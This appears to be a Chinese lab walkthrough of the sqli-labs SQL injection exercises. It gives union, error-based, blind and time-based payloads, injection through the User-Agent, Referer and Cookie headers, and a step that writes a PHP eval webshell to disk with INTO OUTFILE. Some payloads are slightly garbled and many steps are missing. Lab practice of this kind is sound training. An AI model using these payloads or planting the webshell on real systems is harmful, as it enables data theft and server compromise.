插入单引号报错
id被单引号包裹,确认字段数
字段为3,使用union select 1,2,3联合查询语句查看页面是否有显示位
有两个显示位,接下来开始爆库名
爆表
爆列
爆值
插入单引号
由报错判断为数字型注入,注入方法同上,把单引号去掉就好
插入单引号报错,输入?id=1')--+发现可以正常显示,判定为字符型注入
注入方法同上,在单引号后面加个括号即可
插入单引号没反应,换用双引号后报错,注入方法同上
看到这个报错有可能是布尔型盲注,时间盲注,报错注入
注入
考虑使用报错注入
and (select 1 from (select count( ),concat((payload),floor (rand(0) 2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字符
and updatexml(1,payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效
and extractvalue(1, payload)
输出字符有长度限制,最长32位。
使用floor报错语句注入
输出信息超过一行,只能用limit 0,1一个个输出了
库名出来了,接下来方法就和之前一样了
同样的原理,把?id=1'的单引号换成双引号就行
输入?id=1
输入?id=1 and 1=2回显正常,不是数值型注入
尝试加入单引号发现报错,换成双引号也是一样,加上)依然报错
输入id=5')) --+
使用语句
写入成功
上传木马,使用cknife链接
?id=-1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "D:\Software\phpstudy\PHPTutorial\MySQL\muma.php" --+
输入?id=2' --+回显正常
字符型注入,方法同上
输入?id=1' and sleep(5) --+存在延迟,判断为延迟型注入
同上,单引号换双引号
登陆界面,使用万能密码
登陆成功,开爆
爆库:
爆表:
爆字段:
之后方法同上
页面无返回信息,只能进行盲注
猜长度
admin') or length(database())>要猜的长度 and sleep(5)#
猜库名:
admin') or left(version(),1)>'要猜的库名' and sleep(5)#
猜表名:
admin') or ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>要猜的表名ASCII and sleep(5)#
之后方法同上
之后方法同上
和上面一样,无返回信息,但是可以使用延时注入判断注入点
其余同上
做到自闭,查看源码
莫得用户名和密码注入了
查看源码
存在利用构造User Agent进行注入的可能,上brupsuit抓包改User Agent
得到mysql版本
同理,可得表名等信息
表名
Refer注入
查看源码
存在cookie注入
其他同理
和上题一样,属于cookie注入,先看源码
和上题基本一样,之不过给用户名(uname)进行了base64加密,对注入语句进行加密即可
报错注入
与上题基本一样,'改成”即可